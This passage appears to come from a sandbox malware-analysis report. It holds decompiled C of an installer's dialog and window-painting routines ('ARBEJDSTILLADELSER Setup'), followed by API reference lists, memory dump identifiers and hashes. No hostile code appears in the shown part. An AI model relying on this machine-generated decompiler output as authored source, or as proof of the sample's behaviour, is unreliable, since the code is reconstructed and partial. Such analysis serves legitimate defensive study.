					SendMessageA(_v8, 0x1109, 2,  *0x42a874);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062EA(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042D4(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042D4(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f44c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										_t287 = SendMessageA(_v8, 0x1100, 0,  &_v88);
										_t309 =  *0x42a888; // 0x0
										 *(_t309 + _t329 * 4) = _t287;
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
                                                                                                                                                                              									_v80 = 0x4d;
                                                                                                                                                                              									_v48 = 1;
                                                                                                                                                                              									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                                                                                                                                              									_t310 =  *0x42a888; // 0x0
                                                                                                                                                                              									_v36 = 1;
                                                                                                                                                                              									 *(_t310 + _t329 * 4) = _t290;
                                                                                                                                                                              									_t291 =  *0x42a888; // 0x0
                                                                                                                                                                              									_v16 =  *(_t291 + _t329 * 4);
                                                                                                                                                                              								}
                                                                                                                                                                              							}
                                                                                                                                                                              							_t329 = _t329 + 1;
                                                                                                                                                                              							_t316 =  &(_v32[0x418]);
                                                                                                                                                                              							_v32 = _t316;
                                                                                                                                                                              						} while (_t329 <  *0x42f44c);
                                                                                                                                                                              						if(_v36 != 0) {
                                                                                                                                                                              							L20:
                                                                                                                                                                              							if(_v20 != 0) {
                                                                                                                                                                              								E00404309(_v8);
                                                                                                                                                                              								goto L23;
                                                                                                                                                                              							} else {
                                                                                                                                                                              								ShowWindow(_v12, 5);
                                                                                                                                                                              								E00404309(_v12);
                                                                                                                                                                              								L93:
                                                                                                                                                                              								return E0040433B(_a8, _a12, _a16);
                                                                                                                                                                              							}
                                                                                                                                                                              						}
                                                                                                                                                                              						goto L19;
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              			}
                                                                                                                                                                              0x004051e7
                                                                                                                                                                              0x004051ec
                                                                                                                                                                              0x004051f3
                                                                                                                                                                              0x004051f6
                                                                                                                                                                              0x004051f6
                                                                                                                                                                              0x004051fd
                                                                                                                                                                              0x00405209
                                                                                                                                                                              0x0040520d
                                                                                                                                                                              0x0040520f
                                                                                                                                                                              0x0040520f
                                                                                                                                                                              0x004051ff
                                                                                                                                                                              0x00405201
                                                                                                                                                                              0x00405201
                                                                                                                                                                              0x0040522f
                                                                                                                                                                              0x0040523b
                                                                                                                                                                              0x0040524a
                                                                                                                                                                              0x0040524a
                                                                                                                                                                              0x0040524c
                                                                                                                                                                              0x0040524f
                                                                                                                                                                              0x00405258
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040515f
                                                                                                                                                                              0x0040516a
                                                                                                                                                                              0x0040516d
                                                                                                                                                                              0x00405172
                                                                                                                                                                              0x00405174
                                                                                                                                                                              0x00405178
                                                                                                                                                                              0x00405188
                                                                                                                                                                              0x00405192
                                                                                                                                                                              0x00405194
                                                                                                                                                                              0x00405197
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040517a
                                                                                                                                                                              0x0040517a
                                                                                                                                                                              0x00405180
                                                                                                                                                                              0x00405182
                                                                                                                                                                              0x00405182
                                                                                                                                                                              0x00405183
                                                                                                                                                                              0x00405184
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040517a
                                                                                                                                                                              0x0040515d
                                                                                                                                                                              0x00405138
                                                                                                                                                                              0x0040507b
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405091
                                                                                                                                                                              0x0040509b
                                                                                                                                                                              0x004050a0
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004050b2
                                                                                                                                                                              0x004050b7
                                                                                                                                                                              0x004050c3
                                                                                                                                                                              0x004050c3
                                                                                                                                                                              0x004050c5
                                                                                                                                                                              0x004050d4
                                                                                                                                                                              0x004050d6
                                                                                                                                                                              0x004050da
                                                                                                                                                                              0x004050dd
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004050dd
                                                                                                                                                                              0x0040507b
                                                                                                                                                                              0x00404d2f
                                                                                                                                                                              0x00404d32
                                                                                                                                                                              0x00404d35
                                                                                                                                                                              0x00404d45
                                                                                                                                                                              0x00404d58
                                                                                                                                                                              0x00404d63
                                                                                                                                                                              0x00404d69
                                                                                                                                                                              0x00404d77
                                                                                                                                                                              0x00404d8a
                                                                                                                                                                              0x00404d8f
                                                                                                                                                                              0x00404d9a
                                                                                                                                                                              0x00404da3
                                                                                                                                                                              0x00404db9
                                                                                                                                                                              0x00404dc9
                                                                                                                                                                              0x00404dd5
                                                                                                                                                                              0x00404dd5
                                                                                                                                                                              0x00404dda
                                                                                                                                                                              0x00404de0
                                                                                                                                                                              0x00404de2
                                                                                                                                                                              0x00404de5
                                                                                                                                                                              0x00404dea
                                                                                                                                                                              0x00404def
                                                                                                                                                                              0x00404df1
                                                                                                                                                                              0x00404df1
                                                                                                                                                                              0x00404e11
                                                                                                                                                                              0x00404e11
                                                                                                                                                                              0x00404e13
                                                                                                                                                                              0x00404e14
                                                                                                                                                                              0x00404e19
                                                                                                                                                                              0x00404e1f
                                                                                                                                                                              0x00404e23
                                                                                                                                                                              0x00404e28
                                                                                                                                                                              0x00404e30
                                                                                                                                                                              0x00404e34
                                                                                                                                                                              0x00404e39
                                                                                                                                                                              0x00404e3e
                                                                                                                                                                              0x00404e46
                                                                                                                                                                              0x00404e49
                                                                                                                                                                              0x00404f18
                                                                                                                                                                              0x00404f2b
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404e4f
                                                                                                                                                                              0x00404e52
                                                                                                                                                                              0x00404e55
                                                                                                                                                                              0x00404e58
                                                                                                                                                                              0x00404e58
                                                                                                                                                                              0x00404e5d
                                                                                                                                                                              0x00404e66
                                                                                                                                                                              0x00404e69
                                                                                                                                                                              0x00404e6d
                                                                                                                                                                              0x00404e70
                                                                                                                                                                              0x00404e73
                                                                                                                                                                              0x00404e7c
                                                                                                                                                                              0x00404e85
                                                                                                                                                                              0x00404e88
                                                                                                                                                                              0x00404e8b
                                                                                                                                                                              0x00404e8e
                                                                                                                                                                              0x00404ecc
                                                                                                                                                                              0x00404eef
                                                                                                                                                                              0x00404ef1
                                                                                                                                                                              0x00404ef7
                                                                                                                                                                              0x00404ece
                                                                                                                                                                              0x00404edd
                                                                                                                                                                              0x00404edd
                                                                                                                                                                              0x00404e90
                                                                                                                                                                              0x00404e93
                                                                                                                                                                              0x00404ea1
                                                                                                                                                                              0x00404eab
                                                                                                                                                                              0x00404ead
                                                                                                                                                                              0x00404eb3
                                                                                                                                                                              0x00404eba
                                                                                                                                                                              0x00404ebd
                                                                                                                                                                              0x00404ec5
                                                                                                                                                                              0x00404ec5
                                                                                                                                                                              0x00404e8e
                                                                                                                                                                              0x00404efd
                                                                                                                                                                              0x00404efe
                                                                                                                                                                              0x00404f0a
                                                                                                                                                                              0x00404f0a
                                                                                                                                                                              0x00404f16
                                                                                                                                                                              0x00404f31
                                                                                                                                                                              0x00404f34
                                                                                                                                                                              0x00404f51
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404f36
                                                                                                                                                                              0x00404f3b
                                                                                                                                                                              0x00404f44
                                                                                                                                                                              0x004052d7
                                                                                                                                                                              0x004052e9
                                                                                                                                                                              0x004052e9
                                                                                                                                                                              0x00404f34
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404f16
                                                                                                                                                                              0x00404e49

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00404CF0
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00404CFD
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D4C
                                                                                                                                                                              • LoadImageA.USER32 ref: 00404D63
                                                                                                                                                                              • SetWindowLongA.USER32 ref: 00404D7D
                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8F
                                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA3
                                                                                                                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404DB9
                                                                                                                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404DC5
                                                                                                                                                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404DD5
                                                                                                                                                                              • DeleteObject.GDI32(00000110), ref: 00404DDA
                                                                                                                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E05
                                                                                                                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E11
                                                                                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EAB
                                                                                                                                                                              • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404EDB
                                                                                                                                                                                • Part of subcall function 00404309: SendMessageA.USER32(00000028,?,00000001,00404139), ref: 00404317
                                                                                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EEF
                                                                                                                                                                              • GetWindowLongA.USER32 ref: 00404F1D
                                                                                                                                                                              • SetWindowLongA.USER32 ref: 00404F2B
                                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404F3B
                                                                                                                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00405036
                                                                                                                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040509B
                                                                                                                                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004050B0
                                                                                                                                                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 004050D4
                                                                                                                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 004050F4
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 00405109
                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 00405119
                                                                                                                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405192
                                                                                                                                                                              • SendMessageA.USER32(?,00001102,?,?), ref: 0040523B
                                                                                                                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 0040524A
                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00405275
                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 004052C3
                                                                                                                                                                              • GetDlgItem.USER32 ref: 004052CE
                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004052D5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                              • String ID: $M$N
                                                                                                                                                                              • API String ID: 2564846305-813528018
                                                                                                                                                                              • Opcode ID: 0aaace5e7038786aacf0d0ec6efdbd7d394b60eb8694dc7bb3af05aed72767f4
                                                                                                                                                                              • Instruction ID: c814a1149ae8d70461ce7ac85806320f31a4e43cf09a070d2a5393f0519b6fc2
                                                                                                                                                                              • Opcode Fuzzy Hash: 0aaace5e7038786aacf0d0ec6efdbd7d394b60eb8694dc7bb3af05aed72767f4
                                                                                                                                                                              • Instruction Fuzzy Hash: 1E026AB0A00209AFDB20DF64CD45AAE7BB5FB44354F54817AFA10BA2E0C7788D52DF59
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                              			E0040443F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                              				void* _v16;
                                                                                                                                                                              				struct HWND__* _t52;
                                                                                                                                                                              				long _t86;
                                                                                                                                                                              				int _t98;
                                                                                                                                                                              				struct HWND__* _t99;
                                                                                                                                                                              				signed int _t100;
                                                                                                                                                                              				intOrPtr _t103;
                                                                                                                                                                              				signed int _t106;
                                                                                                                                                                              				intOrPtr _t107;
                                                                                                                                                                              				intOrPtr _t109;
                                                                                                                                                                              				int _t110;
                                                                                                                                                                              				signed int* _t112;
                                                                                                                                                                              				signed int _t113;
                                                                                                                                                                              				char* _t114;
                                                                                                                                                                              				CHAR* _t115;
                                                                                                                                                                              
                                                                                                                                                                              				if(_a8 != 0x110) {
                                                                                                                                                                              					__eflags = _a8 - 0x111;
                                                                                                                                                                              					if(_a8 != 0x111) {
                                                                                                                                                                              						L11:
                                                                                                                                                                              						__eflags = _a8 - 0x4e;
                                                                                                                                                                              						if(_a8 != 0x4e) {
                                                                                                                                                                              							__eflags = _a8 - 0x40b;
                                                                                                                                                                              							if(_a8 == 0x40b) {
                                                                                                                                                                              								 *0x42985c =  *0x42985c + 1;
                                                                                                                                                                              								__eflags =  *0x42985c;
                                                                                                                                                                              							}
                                                                                                                                                                              							L25:
                                                                                                                                                                              							_t110 = _a16;
                                                                                                                                                                              							L26:
                                                                                                                                                                              							return E0040433B(_a8, _a12, _t110);
                                                                                                                                                                              						}
                                                                                                                                                                              						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                                                                                                                              						_t110 = _a16;
                                                                                                                                                                              						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
                                                                                                                                                                              						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
                                                                                                                                                                              							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
                                                                                                                                                                              							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                                                                                                                              								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                                                                                                                              								_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                                                                                                                              								_v12 = _t100;
                                                                                                                                                                              								__eflags = _t100 - _t109 - 0x800;
                                                                                                                                                                              								_v16 = _t109;
                                                                                                                                                                              								_v8 = 0x42e3c0;
                                                                                                                                                                              								if(_t100 - _t109 < 0x800) {
                                                                                                                                                                              									SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                                                                                                                              									SetCursor(LoadCursorA(0, 0x7f02));
                                                                                                                                                                              									_push(1);
                                                                                                                                                                              									E004046E3(_a4, _v8);
                                                                                                                                                                              									SetCursor(LoadCursorA(0, 0x7f00));
                                                                                                                                                                              									_t110 = _a16;
                                                                                                                                                                              								}
                                                                                                                                                                              							}
                                                                                                                                                                              						}
                                                                                                                                                                              						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
                                                                                                                                                                              						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
                                                                                                                                                                              							goto L26;
                                                                                                                                                                              						} else {
                                                                                                                                                                              							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
                                                                                                                                                                              							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                                                                                                                              								goto L26;
                                                                                                                                                                              							}
                                                                                                                                                                              							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
                                                                                                                                                                              							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                                                                                                                              								SendMessageA( *0x42f428, 0x111, 1, 0);
                                                                                                                                                                              							}
                                                                                                                                                                              							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
                                                                                                                                                                              							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                                                                                                                              								SendMessageA( *0x42f428, 0x10, 0, 0);
                                                                                                                                                                              							}
                                                                                                                                                                              							return 1;
                                                                                                                                                                              						}
                                                                                                                                                                              					}
                                                                                                                                                                              					__eflags = _a12 >> 0x10;
                                                                                                                                                                              					if(_a12 >> 0x10 != 0) {
                                                                                                                                                                              						goto L25;
                                                                                                                                                                              					}
                                                                                                                                                                              					__eflags =  *0x42985c; // 0x0
                                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                                              						goto L25;
                                                                                                                                                                              					}
                                                                                                                                                                              					_t103 =  *0x42a068; // 0x59dddc
                                                                                                                                                                              					_t25 = _t103 + 0x14; // 0x59ddf0
                                                                                                                                                                              					_t112 = _t25;
                                                                                                                                                                              					__eflags =  *_t112 & 0x00000020;
                                                                                                                                                                              					if(( *_t112 & 0x00000020) == 0) {
                                                                                                                                                                              						goto L25;
                                                                                                                                                                              					}
                                                                                                                                                                              					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                                                                                                              					__eflags = _t106;
                                                                                                                                                                              					 *_t112 = _t106;
                                                                                                                                                                              					E004042F6(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                                                                                                              					E004046BF();
                                                                                                                                                                              					goto L11;
                                                                                                                                                                              				} else {
                                                                                                                                                                              					_t98 = _a16;
                                                                                                                                                                              					_t113 =  *(_t98 + 0x30);
                                                                                                                                                                              					if(_t113 < 0) {
                                                                                                                                                                              						_t107 =  *0x42ebfc; // 0x5a1993
                                                                                                                                                                              						_t113 =  *(_t107 - 4 + _t113 * 4);
                                                                                                                                                                              					}
                                                                                                                                                                              					_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                                                                                                                              					_t114 = _t113 +  *0x42f458;
                                                                                                                                                                              					_push(0x22);
                                                                                                                                                                              					_a16 =  *_t114;
                                                                                                                                                                              					_v12 = _v12 & 0x00000000;
                                                                                                                                                                              					_t115 = _t114 + 1;
                                                                                                                                                                              					_v16 = _t115;
                                                                                                                                                                              					_v8 = E0040440A;
                                                                                                                                                                              					E004042D4(_a4);
                                                                                                                                                                              					_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                                                                                                                              					_push(0x23);
                                                                                                                                                                              					E004042D4(_a4);
                                                                                                                                                                              					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                                                                                                              					E004042F6( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                                                                                                                              					_t99 = GetDlgItem(_a4, 0x3e8);
                                                                                                                                                                              					E00404309(_t99);
                                                                                                                                                                              					SendMessageA(_t99, 0x45b, 1, 0);
                                                                                                                                                                              					_t86 =  *( *0x42f430 + 0x68);
                                                                                                                                                                              					if(_t86 < 0) {
                                                                                                                                                                              						_t86 = GetSysColor( ~_t86);
                                                                                                                                                                              					}
                                                                                                                                                                              					SendMessageA(_t99, 0x443, 0, _t86);
                                                                                                                                                                              					SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                                                                                                                              					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                                                                                                                              					 *0x42985c = 0;
                                                                                                                                                                              					SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                                                                                                                              					 *0x42985c = 0;
                                                                                                                                                                              					return 0;
                                                                                                                                                                              				}
                                                                                                                                                                              			}





















                                                                                                                                                                              APIs
                                                                                                                                                                              • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004044CA
                                                                                                                                                                              • GetDlgItem.USER32 ref: 004044DE
                                                                                                                                                                              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004044FC
                                                                                                                                                                              • GetSysColor.USER32(?), ref: 0040450D
                                                                                                                                                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040451C
                                                                                                                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040452B
                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0040452E
                                                                                                                                                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040453D
                                                                                                                                                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404552
                                                                                                                                                                              • GetDlgItem.USER32 ref: 004045B4
                                                                                                                                                                              • SendMessageA.USER32(00000000), ref: 004045B7
                                                                                                                                                                              • GetDlgItem.USER32 ref: 004045E2
                                                                                                                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404622
                                                                                                                                                                              • LoadCursorA.USER32 ref: 00404631
                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 0040463A
                                                                                                                                                                              • LoadCursorA.USER32 ref: 00404650
                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 00404653
                                                                                                                                                                              • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040467F
                                                                                                                                                                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404693
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                              • String ID: D@$ExecToStack$N
                                                                                                                                                                              • API String ID: 3103080414-2336029164
                                                                                                                                                                              • Opcode ID: 35ee71d5250129fbf2f36168019ba60c9b2f338ba1f9cfece2971a749f388ba2
                                                                                                                                                                              • Instruction ID: ec86402776fd01095bc4262357a67ddb6d4548b01b5252dde79e8ca7eec82ec2
                                                                                                                                                                              • Opcode Fuzzy Hash: 35ee71d5250129fbf2f36168019ba60c9b2f338ba1f9cfece2971a749f388ba2
                                                                                                                                                                              • Instruction Fuzzy Hash: 0761A2B1A00209BBDB10AF61DC45B6A3B68EB84754F10443AFB04BB1D1D7B9A9618F98
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                                              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                                                                                                              				struct tagLOGBRUSH _v16;
                                                                                                                                                                              				struct tagRECT _v32;
                                                                                                                                                                              				struct tagPAINTSTRUCT _v96;
                                                                                                                                                                              				struct HDC__* _t70;
                                                                                                                                                                              				struct HBRUSH__* _t87;
                                                                                                                                                                              				struct HFONT__* _t94;
                                                                                                                                                                              				long _t102;
                                                                                                                                                                              				signed int _t126;
                                                                                                                                                                              				struct HDC__* _t128;
                                                                                                                                                                              				intOrPtr _t130;
                                                                                                                                                                              
                                                                                                                                                                              				if(_a8 == 0xf) {
                                                                                                                                                                              					_t130 =  *0x42f430;
                                                                                                                                                                              					_t70 = BeginPaint(_a4,  &_v96);
                                                                                                                                                                              					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                                                                                                              					_a8 = _t70;
                                                                                                                                                                              					GetClientRect(_a4,  &_v32);
                                                                                                                                                                              					_t126 = _v32.bottom;
                                                                                                                                                                              					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                                                                                                              					while(_v32.top < _t126) {
                                                                                                                                                                              						_a12 = _t126 - _v32.top;
                                                                                                                                                                              						asm("cdq");
                                                                                                                                                                              						asm("cdq");
                                                                                                                                                                              						asm("cdq");
                                                                                                                                                                              						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                                                                                                              						_t87 = CreateBrushIndirect( &_v16);
                                                                                                                                                                              						_v32.bottom = _v32.bottom + 4;
                                                                                                                                                                              						_a16 = _t87;
                                                                                                                                                                              						FillRect(_a8,  &_v32, _t87);
                                                                                                                                                                              						DeleteObject(_a16);
                                                                                                                                                                              						_v32.top = _v32.top + 4;
                                                                                                                                                                              					}
                                                                                                                                                                              					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                                                                                                              						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                                                                                                                              						_a16 = _t94;
                                                                                                                                                                              						if(_t94 != 0) {
                                                                                                                                                                              							_t128 = _a8;
                                                                                                                                                                              							_v32.left = 0x10;
                                                                                                                                                                              							_v32.top = 8;
                                                                                                                                                                              							SetBkMode(_t128, 1);
                                                                                                                                                                              							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                                                                                                              							_a8 = SelectObject(_t128, _a16);
                                                                                                                                                                              							DrawTextA(_t128, "ARBEJDSTILLADELSER Setup", 0xffffffff,  &_v32, 0x820);
                                                                                                                                                                              							SelectObject(_t128, _a8);
                                                                                                                                                                              							DeleteObject(_a16);
                                                                                                                                                                              						}
                                                                                                                                                                              					}
                                                                                                                                                                              					EndPaint(_a4,  &_v96);
                                                                                                                                                                              					return 0;
                                                                                                                                                                              				}
                                                                                                                                                                              				_t102 = _a16;
                                                                                                                                                                              				if(_a8 == 0x46) {
                                                                                                                                                                              					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                                                                                                              					 *((intOrPtr*)(_t102 + 4)) =  *0x42f428;
                                                                                                                                                                              				}
                                                                                                                                                                              				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                                                                                                                              			}














                                                                                                                                                                              APIs
                                                                                                                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                              • GetClientRect.USER32 ref: 0040105B
                                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                              • FillRect.USER32 ref: 004010E4
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                              • DrawTextA.USER32(00000000,ARBEJDSTILLADELSER Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
